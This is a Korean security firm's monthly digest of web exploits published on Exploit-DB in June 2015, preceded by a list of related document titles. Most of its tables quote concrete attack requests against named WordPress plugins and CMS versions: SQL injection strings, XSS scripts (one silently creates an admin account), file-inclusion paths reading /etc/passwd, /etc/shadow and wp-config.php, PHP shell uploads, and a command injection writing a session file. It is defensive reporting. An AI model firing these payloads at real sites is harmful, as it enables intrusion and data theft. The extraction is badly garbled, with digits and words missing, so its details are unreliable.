76 XSS 하 Huge-IT Slider admin.php XSS

Similar documents
EDB 분석보고서 (04.06) ~ Exploit-DB( 에공개된별로분류한정보입니다. Directory Traversal users-x.php 4.0 -support-x.php 4.0 time-

36802 Tune Library / 중 NEX-Forms < admin-ajax.php 하 중 Ultimate Product Catalogue - / 하 중 Ultimate Product Catalogue - ad

EDB 분석보고서 (04.03) ~ Exploit-DB( 에공개된별로분류한정보입니다. ** 5개이상발생한주요소프트웨어별상세 EDB 번호 종류 공격난이도 공격위험도 이름 소프트웨어이름 3037 SQL Inj

EDB 분석보고서 (06.03) ~ Exploit-DB( 에공개된별로분류한정보입니다. 날짜 EDB 번호분류공격난이도공격위험도이름핵심공격코드대프로그램대환경 File Upload 하 C

EDB 분석보고서 (05.0) ~ Exploit-DB( 에공개된별로분류한정보입니다 SQL Injection 하 상 u5cms localize.php SQL U5cms 3607 SQL

EDB 분석보고서 (0.0) 0.0.0~0.0. Exploit-DB( 에공개된별로분류한정보입니다. 날짜 EDB 번호분류공격난이도공격위험도이름핵심공격코드대상프로그램대상환경 SQL Injection 중상 Absolu

** 5 개이발생한주요소프트웨어별취약점세 EDB 번호취약점종류공격난이도공격위험도취약점이름소프트웨어이름

EDB 분석보고서 (06.07) ~ Exploit-DB( 에공개된취약점별로분류한정보입니다 SQL Injection 하중 index.php SQL Injection 취

EDB 분석보고서 (04.09) ~ Exploit-DB( 에공개된취약점별로분류한정보입니다 SQL Injection Like Dislike Counter..3 Plugin - ajax_coun

날짜 EDB 번호취약점분류공격난이도공격위험도취약점이름핵심공격코드대프로그램대환경 Directory Traversal 하 EDB 분석보고서 (05.0) ~ Exploit-DB( 에공개된취약

EDB 분석보고서 (05.08) ~ Exploit-DB( 에공개된별로분류한정보입니다. 날짜 EDB 번호분류공격난이도공격위험도이름핵심공격코드대상프로그램대상환경 7/08/ File Upload 하중.

EDB 분석보고서 (208.0) ~ Exploit-DB( 에공개된취약점별로분류한정보입니다 SQL Injection Smart Google Code Inserter < 3.5 P

POST /process.php HTTP/ XSS 중중 Command Injection 상상 EPESI.8.2 rev XSS ClipBucket Remote Code Execution

EDB 분석보고서 (06.0) ~ Exploit-DB( 에공개된별로분류한정보입니다. 날짜 EDB번호 분류 공격난이도 공격위험도 이름 핵심공격코드 대상프로그램 대상환경 /picosafe_webgui/webint

EDB 분석보고서 (06.0) ~ Exploit-DB( 에공개된취약점별로분류한정보입니다 PHP Imagick / command injection 취약점 /image.j

3708 하 중 Landing Pages Plugin post.php 3708 XSS 하 중 Landing Pages Plugin post-new.php 3707 하 중 NewStatPress Plugin admin.php 3707

3장

FileMaker 15 WebDirect 설명서

ORANGE FOR ORACLE V4.0 INSTALLATION GUIDE (Online Upgrade) ORANGE CONFIGURATION ADMIN O

manual pdfÃÖÁ¾

품질검증분야 Stack 통합 Test 결과보고서 [ The Bug Genie ]

<C0CCBCBCBFB52DC1A4B4EBBFF82DBCAEBBE7B3EDB9AE2D D382E687770>

Secure Programming Lecture1 : Introduction

Microsoft Word - KSR2014S042

ODS-FM1

HTML5가 웹 환경에 미치는 영향 고 있어 웹 플랫폼 환경과는 차이가 있다. HTML5는 기존 HTML 기반 웹 브라우저와의 호환성을 유지하면서도, 구조적인 마크업(mark-up) 및 편리한 웹 폼(web form) 기능을 제공하고, 리치웹 애플리케이 션(RIA)을

105È£4fš

vm-웨어-01장

Ç¥Áö

초보자를 위한 ADO 21일 완성

<4D F736F F D2033BFF920BECBBEE0BFF9B0A3BAB8B0EDBCAD2E646F6378>

Portal_9iAS.ppt [읽기 전용]

Eclipse 와 Firefox 를이용한 Javascript 개발 발표자 : 문경대 11 년 10 월 26 일수요일

UNIST_교원 홈페이지 관리자_Manual_V1.0

PowerPoint プレゼンテーション

<4D F736F F F696E74202D E20C0CEC5CDB3DD20C0C0BFEB20B9D720BCADBAF1BDBA20B1E2BCFA E >

10X56_NWG_KOR.indd

MySQL-Ch05

untitled

untitled

API STORE 키발급및 API 사용가이드 Document Information 문서명 : API STORE 언어별 Client 사용가이드작성자 : 작성일 : 업무영역 : 버전 : 1 st Draft. 서브시스템 : 문서번호 : 단계 : Docum

제목 레이아웃

Analyst Briefing

±¹Á¦ÆòÈŁ4±Ç1È£-ÃÖÁ¾

Week13

목 차 Ⅰ. 일반사항 1 Ⅱ. 특기사항 3 Ⅲ. 물품내역 및 세부규격 8 Ⅳ. 주의사항

컴퓨터과학과 교육목표 컴퓨터과학과의 컴퓨터과학 프로그램은 해당분야 에서 학문적 기술을 창의적으로 연구하고 산업적 기술을 주도적으로 개발하는 우수한 인력을 양성 함과 동시에 직업적 도덕적 책임의식을 갖는 IT인 육성을 교육목표로 한다. 1. 전공 기본 지식을 체계적으로

untitled

본문서는 초급자들을 대상으로 최대한 쉽게 작성하였습니다. 본문서에서는 설치방법만 기술했으며 자세한 설정방법은 검색을 통하시기 바랍니다. 1. 설치개요 워드프레스는 블로그 형태의 홈페이지를 빠르게 만들수 있게 해 주는 프로그램입니다. 다양한 기능을 하는 플러그인과 디자인

Assign an IP Address and Access the Video Stream - Installation Guide

EDB 분석보고서 (05.03) ~ Exploit-DB( 에공개된별로분류한정보입니다 상 상 Spider FAQ - index.php 상 Gallery WD - index.php 36

오늘날의 기업들은 24시간 365일 멈추지 않고 돌아간다. 그리고 이러한 기업들을 위해서 업무와 관련 된 중요한 문서들은 언제 어디서라도 항상 접근하여 활용이 가능해야 한다. 끊임없이 변화하는 기업들 의 경쟁 속에서 기업내의 중요 문서의 효율적인 관리와 활용 방안은 이

第 1 節 組 織 11 第 1 章 檢 察 의 組 織 人 事 制 度 등 第 1 項 大 檢 察 廳 第 1 節 組 대검찰청은 대법원에 대응하여 수도인 서울에 위치 한다(검찰청법 제2조,제3조,대검찰청의 위치와 각급 검찰청의명칭및위치에관한규정 제2조). 대검찰청에 검찰총장,대

Mstage.PDF

DBMS & SQL Server Installation Database Laboratory

CD-RW_Advanced.PDF

User Guide

³»Áö¼öÁ¤

untitled

1217 WebTrafMon II

< FC8A8C6E4C0CCC1F620B0B3B9DF20BAB8BEC8B0A1C0CCB5E5C3D6C1BE28C0FAC0DBB1C7BBE8C1A6292E687770>

Observational Determinism for Concurrent Program Security

초보자를 위한 ASP.NET 2.0

PCServerMgmt7

PowerPoint 프레젠테이션

BEef 사용법.pages

What is ScienceDirect? ScienceDirect는 세계 최대의 온라인 저널 원문 데이터베이스로 엘스비어에서 발행하는 약,00여 종의 Peer-reviewed 저널과,000여권 이상의 도서를 수록하고 있습니다. Peer review Subject 수록된

Microsoft Word - eClipse_사용자가이드_

Spotlight on Oracle V10.x 트라이얼프로그램설치가이드 DELL SOFTWARE KOREA

10.ppt

0. 들어가기 전

Copyright 2012, Oracle and/or its affiliates. All rights reserved.,.,,,,,,,,,,,,.,...,. U.S. GOVERNMENT END USERS. Oracle programs, including any oper

1

untitled

WEB Hacking 한국디지털미디어고등학교, T eampur e, JT JSOFT 장태 진

FMX M JPG 15MB 320x240 30fps, 160Kbps 11MB View operation,, seek seek Random Access Average Read Sequential Read 12 FMX () 2

pdf

PowerPoint Template

SQL Developer Connect to TimesTen 유니원아이앤씨 DB 기술지원팀 2010 년 07 월 28 일 문서정보 프로젝트명 SQL Developer Connect to TimesTen 서브시스템명 버전 1.0 문서명 작성일 작성자

Social Network

문서 템플릿

3ÆÄÆ®-14

소개 TeraStation 을 구입해 주셔서 감사합니다! 이 사용 설명서는 TeraStation 구성 정보를 제공합니다. 제품은 계속 업데이트되므로, 이 설명서의 이미지 및 텍스트는 사용자가 보유 중인 TeraStation 에 표시 된 이미지 및 텍스트와 약간 다를 수

LCD Display

01 EDITOR S PICK: 068_ _069

partprime_intro.key

목차 본 취급설명서의 사용법 본 사용설명서에서는 제품상에 표시된 채널명 및 버튼명, 소프트웨어의 메뉴명 등이 대괄호 ([ ]) 안에 표시됩니 (예: [MASTER] 채널, [ON/ OFF], [File] 메뉴) 시작하시기 전에 특징...3 부속품...4 시작하시기 전에

Supplier_Connect_User_Guide_Korean

..,. Job Flow,. PC,.., (Drag & Drop),.,. PC,, Windows PC Mac,.,.,. NAS(Network Attached Storage),,,., Amazon Web Services*.,, (redundancy), SSL.,. * A

Copyright 2012, Oracle and/or its affiliates. All rights reserved.,,,,,,,,,,,,,.,..., U.S. GOVERNMENT END USERS. Oracle programs, including any operat

1

본 기기에 대하여 언제, 어디서나 자유롭게 LG 넷하드를 구입해주셔서 감사합니다. LG 넷하드는 인터넷이 연결된 곳이라면 언제 어디서나 자유롭게 파일을 저장하고 공유할 수 있는 장치입니다. 2

Microsoft PowerPoint - web-part03-ch19-node.js기본.pptx

Remote UI Guide

AGENDA 모바일 산업의 환경변화 모바일 클라우드 서비스의 등장 모바일 클라우드 서비스 융합사례

<3132BFF93136C0CFC0DA2E687770>

Windows Embedded Compact 2013 [그림 1]은 Windows CE 로 알려진 Microsoft의 Windows Embedded Compact OS의 history를 보여주고 있다. [표 1] 은 각 Windows CE 버전들의 주요 특징들을 담고

2015°ø¹«¿øÇѱ¹»ç1´Ü¿ø

ÀÎÅÍ³Ý ÁøÈï¿ø 5¿ù

PowerPoint 프레젠테이션

Transcription:

분석내용정리 ( 작성 : 펜타시큐리티시스템보안성평가팀 ) EDB 분석보고서 (05.06) 05.06.0~05.06.0 Exploit-DB(http://exploit-db.com) 에공개된별로분류한정보입니다. 05 년 6 월에공개된 Exploit-DB 의분석결과, LFI 공격에대한보고개수가가장많았습니다. LFI 공격은대체적으로공격난이도는낮지만공격이성공했을경우시스템의주요파일들이노출되거나파일다운로드가가능해지기때문에위험도가높은공격으로분류됩니다. LFI 공격및 Directory Traversal 이성공하는이유는사용자의입력값을추가적인보안조치없이그대로시스템에서사용하기때문입니다. 이를응용하여다른공격시도가많이발생할수있으므로관리자는사용자입력값을시스템에서그대로사용하는것을최대한방지하여야됩니다. 이번달주요소프트웨어별발생현황에서는지난달에이어 Wordpress 에대한보고개수가가장많은것으로확인되었으며공격종류도다양한것으로분석되었습니다. Plugin 에대한대대적인업데이트가필요해보입니다.. 별보고개수 보고개수 LFI XSS 0 SQL 9 File Upload Command RFI Directory Traversal 총합계 8 40 5 0 5 0 5 0 5 0 0 LFI XSS SQL 9 별보고개수 File Upload Command RFI Directory Traversal 8 총합계. 위험도별분류위험도 보고개수 백분율 상 5.% 86.8% 하 0 0.0% 합계 8 00% 위험도별분류 5 상. 공격난이도별현황공격난이도 보고개수 백분율 상 7.9% 5.% 하 86.8% 총합계 8 00% 공격난이도별현황 상 하 4. 주요소프트웨어별발생현황소프트웨어이름 Vfront ZCMS Novius Pasworld TYPO BlackCat Vesta Control Panel Thycotic WedgeOS 총합계 보고개수 8 주요소프트웨어별발생현황 Vfront ZCMS Novius Pasworld TYPO BlackCat ** 5개이상발생한주요소프트웨어별상세 EDB 번호 종류 공격난이도 공격위험도 이름 소프트웨어이름 78 SQL 하 LeagueManager.9. Plugin - / SQL 700 LFI 하 zm Ajax Login & Register Plugin.0.9 - admin-ajax.php LFI 75 File Upload 하 상 Nmedia Member Conversation Plugin.5.0 - doupload.php File Upload 709 LFI 하 Really Simple Guest Post - simple-guest-post-submit.php LFI 744 LFI 하 Plugin 'WP Mobile Edition' css.php LFI 74 mmand Inject 하 Wp-ImageZoom - div_img.php Command 764 XSS 하 Encrypted Contact Form Plugin.0.4 - options-general.php XSS 75 LFI 하 RobotCPA Plugin V5 - f.php SQL 754 LFI 하 History Collection - download.php LFI 775 File Upload 하 상 Aviary Image Editor Add On For Gravity Forms.0 - upload.php File Upload 774 LFI 하 SE HTML5 Album Audio Player..0 - download_audio.php LFI

76 XSS 하 Huge-IT Slider.7.5 - admin.php XSS

날짜 EDB 번호분류공격난이도공격위험도이름핵심공격코드대상프로그램대상환경 05-06-0 78 SQL 하 05-06-0 786 XSS 하 05-06-0 786 XSS 하 05-06-0 786 XSS 하 05-06-04 700 LFI 하 EDB 분석보고서 (05.06) 05.06.0~05.06.0 Exploit-DB(http://exploit-db.com) 에공개된별로분류한정보입니다. LeagueManager.9. Plugin - / SQL VFront 0.99. - variabili.php XSS VFront 0.99. - log.php XSS VFront 0.99. - query_editor.php XSS zm Ajax Login & Register Plugin.0.9 - adminajax.php LFI /?match=%0and%099=99 /vfront-0.99./vfront- 0.99./admin/variabili.php?feed=0&gidfocus=0 Inject XSS into 'the altezza_iframe_tabella_gid' input field to store in database. "/><script>alert(666)</script> /vfront-0.99./vfront- 0.99./admin/log.php?op="/><script>var xhr%dnew XMLHttpRequest();xhr.onreadystatechange%dfunction(){ if(xhr.status%d%d00){if(xhr.readystate%d%d4){al ert(xhr.responsetext);}}};xhr.open('post','utenze.db.php?i nsert_new',true);xhr.setrequestheader('contenttype','application/x-www-formurlencoded');xhr.send('nome%dhyprlinxe%6cognome %dapparitionsec%6email%dx@x.com%6passwd% dhacked%6passwd%dhacked');</script>&tabella=&ui d=&data_dal=all&data_al=all /vfront-0.99./vfront- 0.99./admin/query_editor.php?id=&id_table=&id_campo ="/><script>alert(666)</script> POST /wp-admin/admin-ajax.php HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 Chrome/6.0.9.75 Safari/55.7 action=load_template&template=../etc/passwd LeagueManag er.9. Plugin Vfront VFront 0.99. Vfront VFront 0.99. Vfront VFront 0.99. zm Ajax Login & Register Plugin.0.9 05-06-05 75 File Upload 하상 Nmedia Member Conversation Plugin.5.0 - doupload.php File Upload POST /wordpress/wp-content/plugins/wordpress-memberprivate-conversation/doupload.php HTTP/. Connection: Close Accept: text/html, application/xhtml+xml, */* Accept-Language: ko-kr User-Agent: Mozilla/5.0 (compatible; MSIE 0.0; Windows NT 6.; WOW64; Trident/6.0) Content-Type: multipart/form-data; boundary=--------------- ------------7dd009908f -----------------------------7dd009908f Content-Disposition: form-data; name="filedata"; filename="lo.php" Content-Type: application/octet-stream Nmedia Member Conversation Plugin.5.0 <? phpinfo();?> -----------------------------7dd009908f-- 05-06-05 709 LFI 하 Really Simple Guest Post - simple-guest-postsubmit.php LFI POST /wp-content/plugins/really-simple-guest-post/simpleguest-post-submit.php HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 Chrome/6.0.9.75 Safari/55.7 Really Simple Guest Post rootpath=/etc/passwd 05-06-08 745 SQL 하 05-06-08 744 LFI 하 Pasworld - detail.php SQL Plugin 'WP Mobile Edition' css.php LFI /detail.php?id=%0and%0=-- /wp-content/themes/mtheme- Unus/css/css.php?files=../../../../wp-config.php Pasworld Pasworld All Versions Plugin 'WP Mobile Edition' 05-06-08 74 Command 05-06-09 748 SQL 하 하 Wp-ImageZoom - div_img.php Command /wp-content/plugins/wpimagezoom/div_img.php?cmd=delall Clone Script.0 - /milw0rm/related.php?program=lol' AND (SELECT * related.php SQL FROM (SELECT(SLEEP(5)))yYCj) AND 'mqub'='mqub Wp- ImageZoom..0 Clone Script.0 05-06-0 764 XSS 하 Encrypted Contact Form Plugin.0.4 - optionsgeneral.php XSS POST /wp-admin/options-general.php?page=conformconf HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 Chrome/6.0.9.75 Safari/55.7 Encrypted Contact Form Plugin.0.4 iframe_url="></iframe><script>alert('xss!');</script>

EDB 분석보고서 (05.06) 05.06.0~05.06.0 Exploit-DB(http://exploit-db.com) 에공개된별로분류한정보입니다. 날짜 EDB 번호분류공격난이도공격위험도이름핵심공격코드대상프로그램대상환경 05-06-0 76 LFI 하.6 - // LFI POST /wp-admin/options-general.php?page=conformconf HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 Chrome/6.0.9.75 Safari/55.7 Cookie: lang=../../../../../../../etc/passwd%00.6 05-06-0 760 Directory Traversal 05-06-0 759 SQL 상 하 6.5. - /bonita/portal/ Directory Traversal.0.5.4p6 - show_sys_state.php SQL /bonita/portal/themeresource?theme=portal/../../../../../../../../../../../../../../../../&location=windows/system.ini /monitor/show_sys_state.php?state=server&server=- %0UNION%0SELECT%0,version%8%9%0-- %0-6.5..0.5.4p6 05-06-0 75 LFI 하 RobotCPA Plugin V5 - f.php SQL /wpcontent/plugins/robotcpa/f.php?l=cghwoi8vzmlsdgvylj lc9cmnlps4vli4vli4vli4vdaty9uzmlnlnboca== RobotCPA Plugin V5 05-06-0 754 LFI 하 05-06-0 760 RFI 하 History Collection - download.php LFI 6.5. - login.jsp RFI /wordpress/wp-content/plugins/historycollection/download.php?var=../../../wp-config.php /bonita/login.jsp?_l=en&redirecturl=//immuniweb.com/ History Collection <=.. 6.5. 05-06- 775 File Upload 하상 Aviary Image Editor Add On For Gravity Forms.0 - upload.php File Upload POST /wp-content/plugins/aviary-image-editor-add-on-forgravity-forms/includes/upload.php HTTP/. Connection: Close Accept: text/html, application/xhtml+xml, */* Accept-Language: ko-kr User-Agent: Mozilla/5.0 (compatible; MSIE 0.0; Windows NT 6.; WOW64; Trident/6.0) Content-Type: multipart/form-data; boundary=--------------- ------------7dd009908f -----------------------------7dd009908f Content-Disposition: form-data; name="filedata"; filename="shell.php" Content-Type: application/octet-stream Aviary Image Editor Add On For Gravity Forms.0 <? phpinfo();?> -----------------------------7dd009908f-- 05-06- 774 LFI 하 05-06- 77 SQL 하 SE HTML5 Album Audio Player..0 - download_audio.php LFI ZCMS. - /ZCMS_./ SQL /wp-content/plugins/se-html5-album-audioplayer/download_audio.php?file=/wpcontent/uploads/../../../../../etc/passwd POST /ZCMS_./ZCMS_./?dir=login HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 Chrome/6.0.9.75 Safari/55.7 SE HTML5 Album Audio Player..0 ZCMS ZCMS. username=admin&pass=hell' OR ''=' 05-06- 77 XSS 하 ZCMS. - /ZCMS_./ XSS /ZCMS_./ZCMS_./?dir=editpost&p=&title="<script>a lert()</script>&content=<script>alert()</script>&author= <script>alert()</script>satan&visibility=&type=&comm =0 05-06- 77 XSS 하 ZCMS. - index.jsp XSS /ZCMS_./ZCMS_./index.jsp?dir=editpost&p=&autho r=<script>alert(666)</script> 05-06- 770 XSS 하 POST /kilrizzy--cms-f7464/kilrizzy--cmsf7464/index.php/system/settings HTTP/. CMS - /kilrizzy-- User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 CMS-f7464/kilrizzy-- CMSf7464/index.php/system/setti Chrome/6.0.9.75 Safari/55.7 ngs XSS ZCMS ZCMS. ZCMS ZCMS. CMS f7464 from_name=<script>alert(666)</script> 05-06- 770 LFI 하 CMS - /kilrizzy-- CMS-f7464/kilrizzy-- CMSf7464/index.php/connector LFI /kilrizzy--cms-f7464/kilrizzy--cmsf7464/index.php/connector$url=../../../../../../xampp/ph pinfo.php CMS f7464 05-06-6 70 SQL 상상 /typoconf/ext/sb_akronymmanager/mod/index.php? TYPO Akronymmanager id=79%7%0union%0select%0(select%0gro Extension 0.5.0 - index.php SQL up_concat(username,%7:%7,password) %0FROM%0be_users),%0--%0 TYPO TYPO Akronymman ager Extension 0.5.0 05-06-7 704 LFI 하 BlackCat CMS.. - logs.php LFI /blackcat/modules/blackcat/widgets/logs.php?dl=../config. php BlackCat BlackCat CMS..

EDB 분석보고서 (05.06) 05.06.0~05.06.0 Exploit-DB(http://exploit-db.com) 에공개된별로분류한정보입니다. 날짜 EDB 번호분류공격난이도공격위험도이름핵심공격코드대상프로그램대상환경 05-06-4 769 Command 상 Vesta Control Panel 0.9.8 - index.php Command /list/backup/index.php?backup=%7%0 %0 echo 'V0VCXNZURFTXxzOjc6ImFwYWNoZTIiOdFQl9SRJPV VBTfHM6ODoiddLWRhdGEiOdFQl9QTJUfHM6NDoiO DA4MCI7V0VCXNTTHxzOjc6ImvZF9zcwiOdFQl9TU0x fue9svhxzojq6ijg0ndmiobsthzxnzurftxxzoju6i m5naw54ijtquk9ywv9qtjufhm6mjoiodaiobsthzx NTTF9QTJUfHM6MzoiNDQzIjtGVFBfUlTVEVNfHM6Njoi dnnmdhbkijtnqulmxnzurftxxzoju6imv4aw00ijtjtu FQXNZURFTXxzOjc6ImRvdmVjbQiO0FOVElWSVJVU9 TWVNURU8czowOiIiO0FOVElTUEFNXNZURFTXxzOjA6I Vesta Control ii7rejfultvevnfhm6ntoibxlzcwwio0rou9twvnuru Panel 8czoOiJiaW5kOSI7URBVFNfUlTVEVNfHM6MTc6IndlY mfsaxplcixhdn0yxrzijtcqunlvvbfultvevnfhm6ntoi bg9jywwio0nst05fultvevnfhm6ndoiyjvbii7relts9 RVU9UQXxzOjI6Im5vIjtGSVJFV0FMTF9TWVNURU8czo4O ijpchrhymxlcyi7rklsrvdbtexfrvhuru5tsu9ofhm6odoi ZmFpbDJiYW4iOJFUE9TSVRPUll8czoOiJjbWudCI7VkVS U0lPTnxzOjU6IjAuOS44IjtMQU5HVUFHRXxzOjI6ImVuIjtsY W5ndWFnZXxzOjI6ImVuIjtcVyfHM6NToiYWRtaW4iOJ hyt8czoxmtoilxpcqvdxnlci8iow==' base64 -- decode > /tmp/sess_45%0 %0echo%0\ Vesta Control Panel 0.9.8 05-06-4 764 File Upload 하 SimpleImageUpload - index.php File Upload POST /index.php?option=com_simpleimageupload&view=uploa d&tmpl=component&e_name=desc HTTP/. Connection: Close Accept: text/html, application/xhtml+xml, */* Accept-Language: ko-kr User-Agent: Mozilla/5.0 (compatible; MSIE 0.0; Windows NT 6.; WOW64; Trident/6.0) Content-Type: multipart/form-data; boundary=--------------- ------------7dd009908f SimpleImageU pload.0 -----------------------------7dd009908f Content-Disposition: form-data; name="filedata"; filename="l0v.php." Content-Type: application/octet-stream <? phpinfo();?> -----------------------------7dd009908f-- 05-06-4 76 SQL 상상 0.0. - register.php SQL POST /genixcms/register.php HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 Chrome/6.0.9.75 Safari/55.7 0.0. email='and(select%0%0from%0(select%0count(*),concat(version(),floor(rand(0)*))x%0from%0informa tion_schema.tables%0group%0by%0x)a)and'&pass =cfreer&pass=cfreer&register=&token=&userid=poc-lab 05-06-4 76 XSS 하 Huge-IT Slider.7.5 - admin.php XSS POST /wordpress/wpadmin/admin.php?page=sliders_huge_it_slider&id=&task =apply HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 Chrome/6.0.9.75 Safari/55.7 Huge-IT Slider.7.5 titleimage4=%+onmouseover%dalert%8%fi0aki N_hack%F%9+a%D%& 05-06-4 760 XSS 하 05-06-6 794 XSS 하 05-06-0 7446 SQL 하 0.0. - index.php XSS Thycotic Secret Server 8.8.000004 - /SecretServer/api.ashx/simpleho me/ XSS CMS.0_.9. - rating.php SQL /-master/master/gxadmin/index.php?page=posts&q='<script>alert ('XSS By Hyprlinx')</script> /SecretServer/api.ashx/simplehome/GetSecretItemValue?s ecretitemid=<script>alert();</script>&audi taction=unmask POST //fiyocms/apps/app_article/controller/rating.php HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 Chrome/6.0.9.75 Safari/55.7 Thycotic 0.0. Thycotic Secret Server 8.8.000004 CMS.0_.9. do=getrate&id=8;select sleep(5) --

EDB 분석보고서 (05.06) 05.06.0~05.06.0 Exploit-DB(http://exploit-db.com) 에공개된별로분류한정보입니다. 날짜 EDB 번호분류공격난이도공격위험도이름핵심공격코드대상프로그램대상환경 05-06-0 7446 SQL CMS.0_.9. - /fiyocms/user/login SQL POST /fiyocms/user/login HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 Chrome/6.0.9.75 Safari/55.7 CMS.0_.9. 05-06-0 744 LFI 하 05-06-0 749 LFI 하 05-06-0 749 RFI 하 user='%b(select(0)from(select(sleep(5)))v)%b'&pass=p oc-lab&login=login WedgeOS <= 4.0.4 - /ssgmanager/ssgimages?name=../../../../../etc/shadow /ssgmanager/ LFI Novius 5.0. - /novius-os.5.0.- /novius-os.5.0.-elche/noviusos/admin/?tab=../../../../xampp/phpinfo.php elche/novius-os/admin/ LFI Novius 5.0. - /novius-os.5.0.- elche/novius-os/admin/nos/ RFI /novius-os.5.0.-elche/noviusos/admin/nos/login?redirect=http://www.satansbronze BABYSHOES.com WedgeOS WedgeOS <= 4.0.4 Novius Novius 5.0. Novius Novius 5.0.